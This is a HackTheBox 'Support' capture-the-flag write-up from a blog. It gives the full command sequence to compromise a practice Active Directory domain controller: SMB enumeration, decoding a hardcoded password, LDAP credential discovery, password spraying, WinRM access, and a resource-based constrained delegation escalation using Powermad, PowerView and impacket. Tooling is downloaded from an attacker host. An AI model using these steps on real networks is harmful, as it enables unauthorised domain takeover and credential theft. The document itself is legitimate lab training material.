HackTheBox Support Writeup

We start by scanning the ports of the machine with nmap

❯ nmap -Pn 10.10.11.174
Nmap scan report for 10.10.11.174
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Since smb is open we can try to list shares

❯ smbclient -L 10.10.11.174 -N
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	support-tools   Disk      support staff tools
	SYSVOL          Disk      Logon server share

we see the resource support-tools which contains certain files

❯ smbclient //10.10.11.174/support-tools -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0
  ..                                  D        0
  7-ZipPortable_21.07.paf.exe         A  2880728
  npp.8.4.1.portable.x64.zip          A  5439245
  putty.exe                           A  1273576
  SysinternalsSuite.zip               A 48102161
  UserInfo.exe.zip                    A   277499
  windirstat1_1_2_setup.exe           A    79171
  WiresharkPortable64_3.6.5.paf.exe   A 44398000

      4026367 blocks of size 4096. 850518 blocks available

They seem generiic programs but we can see a Userinfo.exe.zip We download it

smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip
smb: \> exit

If we look at the content we can see an exe and several dll, we will analyze the .exe fiile

❯ 7z l UserInfo.exe.zip
Listing archive: UserInfo.exe.zip

--
Path = UserInfo.exe.zip
Type = zip
Physical Size = 277499

  Size   Compressed  Name
------ ------------  ------------------------
 12288         5424  UserInfo.exe
 99840        41727  CommandLineParser.dll
 22144        12234  Microsoft.Bcl.AsyncInterfaces.dll
 47216        21201  Microsoft.Extensions.DependencyInjection.Abstractions.dll
 84608        39154  Microsoft.Extensions.DependencyInjection.dll
 64112        29081  Microsoft.Extensions.Logging.Abstractions.dll
 20856        11403  System.Buffers.dll
141184        58623  System.Memory.dll
115856        32709  System.Numerics.Vectors.dll
 18024         9541  System.Runtime.CompilerServices.Unsafe.dll
 25984        13437  System.Threading.Tasks.Extensions.dll
   563          327  UserInfo.exe.config
------ ------------  ------------------------
652675       274861  12 files

Analyzing it with dnSpy we can see Protected among other thiings.

If we look at the .cctor() we can find a string called enc_password and a key.

Now in getPassword() we can figure out how to decode the string.

we can do it with python and we get the decoded string

❯ python3
Python 3.10.0 on linux
>>> enc_password = b"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
>>> key = b"armando"
>>> import base64
>>> array = base64.b64decode(enc_password)
>>> array2 = []
>>> for i in range(len(array)):
...     array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))
>>> print("".join(array2))
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Listiing ldap with the password, we can find an iinfo field with password

❯ ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep info:
info: Ironside47pleasure40Watchful

We can create a dictionray and do passwordspray

❯ ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U' > users.txt
❯ crackmapexec winrm 10.10.11.174 -u users.txt -p Ironside47pleasure40Watchful
WINRM       10.129.168.220  5985   DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:support.htb)
WINRM       10.129.168.220  5985   DC               [*] http://10.10.11.174:5985/wsman
WINRM       10.129.168.220  5985   DC               [-] support.htb\krbtgt:Ironside47pleasure40Watchful
WINRM       10.129.168.220  5985   DC               [-] support.htb\ldap:Ironside47pleasure40Watchful
WINRM       10.129.168.220  5985   DC               [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)

The user support is valid, we can connect wiith evil-wlnrm and we can read the flag

❯ evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful
PS C:\Users\support\Documents> whoami
support\support
PS C:\Users\support\Documents> type ..\Desktop\user.txt
8c8***************************375
PS C:\Users\support\Documents>

We can guide and follow the steps of this article to cliimb.

Let start by uploading the PowerView.ps1 and Powermad.ps1 modules and import them

PS C:\ProgramData> curl 10.10.14.13/Powermad.ps1 -o Powermad.ps1
PS C:\ProgramData> curl 10.10.14.13/PowerView.ps1 -o PowerView.ps1
PS C:\ProgramData> Import-Module .\Powermad.ps1
PS C:\ProgramData> Import-Module .\PowerView.ps1
PS C:\ProgramData>

We start by creatiing an account with the name kira01 and password 123456

PS C:\ProgramData> New-MachineAccount -MachineAccount kira01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = kira01$
Verbose: [+] Distinguished Name = CN=kira01,CN=Computers,DC=support,DC=htb
[+] Machine account fake01 added
PS C:\ProgramData>

Then we need to get the sid of the account we created

PS C:\ProgramData> Get-DomainComputer fake01 -Properties objectsid

objectsid
---------
S-1-5-21-1677581083-3380853377-188903654-5601

PS C:\ProgramData>

And follow me with this step

PS C:\ProgramData> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)"
PS C:\ProgramData> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\ProgramData> $SD.GetBinaryForm($SDBytes, 0)
PS C:\ProgramData> Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
PS C:\ProgramData>

Remember to add support.htb and dc.pupport.htb to /etc/hosts file

Now we can do iit with impacket

❯ impacket-getST support.htb/kira01:123456 -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb
Impacket - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache

With the ticket we can connect with wmlexec and become Adminiistrator

❯ export KRB5CCNAME=administrator.ccache
❯ impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k
Impacket - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\> whoami
support\administrator

C:\> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt
633**************************40a

C:\Users\Administrator\Desktop>

We Pwned The Machine.... Happy Hacking !!!!

HackTheBox Support Writeup

Posted by KIRA

Post a Comment

0 Comments

About Me

Comments

Search This Blog

Popular Posts

how to perform arp spoofing with mitmproxy

Menu Footer Widget

Contact form

HackTheBox Support Writeup

Posted by KIRA

You may like these posts

Post a Comment

0 Comments

About Me

Comments

Search This Blog

Social Plugin

Popular Posts

how to perform arp spoofing with mitmproxy

Menu Footer Widget

Contact form